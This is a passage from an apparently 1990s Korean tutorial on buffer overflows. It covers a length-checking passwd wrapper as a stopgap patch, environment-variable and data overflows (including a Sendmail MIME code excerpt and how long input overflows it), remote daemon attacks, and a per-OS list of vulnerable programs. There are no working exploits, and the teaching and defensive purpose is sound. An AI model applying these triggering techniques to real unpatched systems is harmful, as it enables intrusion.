체크해서 argument가 그 length를 넘는 경우, 수행을 중지시켜 버린다.
syslog()를 포함시켜서, 만일 이러한 시도가 있는 경우, LOG로 남도록 유도할 수
있도록 하였다.

차이점이 있다면 원래의 overflow가 존재하는 /bin/passwd 가 /bin/passwd.6555로
옮겨갔는데, 이 passwd.6555의 permission은 0111로 setuid및 setgid가 붙어 있지
않은 것이다. 그러므로, 이 프로그램을 overflow해도 shell을 띄울 지언정 root
shell은 띄울 수가 없다. 그리고, /bin/passwd를 수행하면 wrapper가 바로
그것이므로, maxlength가 넘어가면 수행을 중지하고, 넘지 않으면 overflow가
없으므로 그대로 그 argument들을 /bin/passwd.6555로 넘겨주어 수행하도록 한다.

다음은 passwd wrapper를 깐 후의 실행예이다.

-------(*)
% passwd abcdefg
passwd: abcdefg does not exist.
% passwd abcdefghijklmn
passwd: abcdefghijklmn does not exist.
% passwd a01234567890123456
You have exceeded the argument length ...Exiting
%
-------(*)

length가 MAX를 넘지 않는 경우는 그대로 passwd.6555를 실행하지만, 위에서
정의한 maxlength 16을 넘은 것은 passwd.6555로 넘기기 전에 먼저 수행을
중지시켜 버린다.

이와 같은 방식으로 앞에서 이야기 한 rlogin, ping, traceroute 등도 모두
패치시킬 수 있는데, 사실은 이것이 좋은 방법은 아니다. gethostbyname()이 든
모든 프로그램을 패치하는 것 보다는 gethostbyname()자체를 패치하는 것이 가장
확실한 방법이며, 수고를 덜 수 있다. 위의 패치법은 업체로 부터 패치가 나오지
않은 경우에 하는 미봉책이며, 업체로 부터 패치가 나오면 그때는 업체의 패치를
이용하는 것이 바람직 할 것이다.

[ 그외의 overflow attack 방법 ]

현재까지 언급한 것들은 Argument overflow attack 방법이었다. 그러나, 이들
방법 이외에도 VARIABLE overflow 및 data overflow방법 등의 존재한다.

* VARIABLE overflow

VARIABLE overflow방법은 shell상의 어떤 환경 변수들을 프로그램에서 받아들이게
될 때 생기는 문제점이다. 가장 간단한 예로 X window에서 DISPLAY 변수를 맞추어
주는 것을 생각해 볼 수 있다. 이 DISPLAY라는 변수에는 현재 X에 의해서 x
program들이 뜰 호스트의 IP를 가지게 된다. 이때 이 변수에 엄청나게 긴
문자열을 넣어 놓는다면 overflow가 생길 수도 있다.

C 프로그램으로 shell의 VARIABLE을 받아들일 때에는 getenv()라는 함수를
이용한다. 이때 getenv()는 length check를 하지 않기 때문에, getenv에 의해서
받아들인 문자열을 그대로 프로그램 내부에서 사용할 때, 심각한 문제점을 야기
할 수 있다.

최근에 문제점으로 등장하였던 Linux의 NLSPATH 변수를 이용한 overflow는 이러한
문제점을 이용한 것이었다. NLSPATH라는 변수를 읽어들이는 함수 중 "su"를
exploit하는 code가 인터넷 상에 그대로 발표되었다.

* data overflow

이것은 application상에서 들어가는 data자체를 overflow 시킬때의 방법이다.
일반적인 argument 및 VARIABLE overflow와는 달리 이것은 프로그램 중간에
data가 처리될 때의 문제점을 뽑아내는 것이기 때문에 좀 찾아내기가 어려운 면이
있다.

가장 특별한 예제로 Sendmail8.8.0에서 MIME overflow bug가 나왔었는데, 이것은
MIME의 mime7to8()함수의 문제점으로 인해서 나타난 버그이다. 다음은 간략한
부분 source이다.

------(*)
u_char *obp;
char buf[MAXLINE];
u_char obug[MAXLINE];
....
                /* quoted-printable */
                obp = obuf;
                while (fgets(buf, sizeof buf, e->e_dfp) != NULL)
                {
                if (mime_fromqp((u_char *)buf, &obp, 0, MAXLINE) == 0)
                                continue;
                putline((char *) obuf, mci);
                obp = obuf;
                }
-------(*)

mime_fromqp()가 끝이 "=\n"으로 끝나는 경우 두 캐릭터를 없애면서 다음 라인을
다시 받아들이게 된다. 그러므로, 맨 끝에 "="를 첨가하면 얼마든지 긴 data를
만들어 낼 수 있는데, 이런 식으로 문자열은 무한히 길게 늘일 수 있는 반면
output buffer의 length는 MAXLINE으로 결정되어 있으므로 overflow가 발생하게
된다. 이때 overflow가 되면서 stack의 윗부분을 덮게 되고, 이때 우리가 원하는
코드를 수행하게 할 수 있다.

* remote hack도 가능한가?

overflow에 의해서 remote hack도 가능한가? 당연히 가능하다. 외부에 열어놓은
각종 daemon들이 외부로 부터 data를 받을 때, 그것의 length checking을 하지
않는다면, 충분이 일어날 수 있는 일이다. 각 시스템은 대체로 업체에서 보내준OS
install disk를 이용하여 OS를 install하므로, 그 형태 및 위치등이 모두 똑같게
된다. 그러므로, 한 군데에서 remote hack을 발견하였다면 그것과 동일한 OS를
사용하는 호스트에 모두 먹히게 되는 것이다.

가장 널리 알려질 만한 것이라면, WWW daemon의 cgi-bin directory안에 있는 여러
바이너리들일 것이다. 최근에 nph-test-cgi라는 것의 overflow가 두각되었는데,
만일 이것을 overflow시키게 된다면 외부에서 - 물론 nobody권한이겠지만 -
shell을 띄워가지고 사용할 수 있게 된다. 물론 위에서 이야기 된 sendmail
MIME버그 또한 remote hack이 가능한 것이다.

[ overflow 강좌의 마무리 ]

현재까지 overflow란 무엇이며, 어떻게 공격할 수 있는지에 관하여 알아보았다.
이 버그는 정말 최근에 나타난 것으로 예전에는 별로 알려져 있지도 않았고,
그때문에 OS를 만드는 업체에서 조차 이 버그에 대해서 대응을 제대로 하고 있지
못한 형편이다.

필자 개인적인 생각으로는 올해가 넘어가면 이 버그에 대해서 대부분 안전해
질것으로 보고 있다. Solaris2.6도 발표된다고 하는데, 분명히 overflow bug가
대부분 패치될 것으로 기대하고 있다.

어쨌든 현실은 현실이므로, 현재 인터넷을 설치고 다니고 있는 여러
overflow버그들에 대해서 여기 아래에 소개하겠다. 각각에 대해서 patch를 하기를
바라며, 이정도로 overflow강좌를 마치도록 하겠다.

LINUX
-----
cron overflow
NLSPATH overflow
inn overflow
lpr overflow

Solaris
-------
ffbconfig overflow
gethostbyname overflow
passwd overflow
fdformat overflow
eject overflow
getopt overflow

HP_UX
-----
vgdisplay overflow
chfn overflow
newgrp overflow
passwd overflow
rlogin overflow

AIX
---
gethostbyname overflow
rlogin overflow

FreeBSD
-------
cron overflow
modstat overflow
rlogin overflow
setlocale() overflow
(Global VARIABLE bug)

BSD
---
rlogin overflow
lpr overflow

REMOTE
------
talkd overflow
 sendmail MIME overflow
nph-test-cgi overflow

                        Copyright MISO Tech.Co.,Ltd.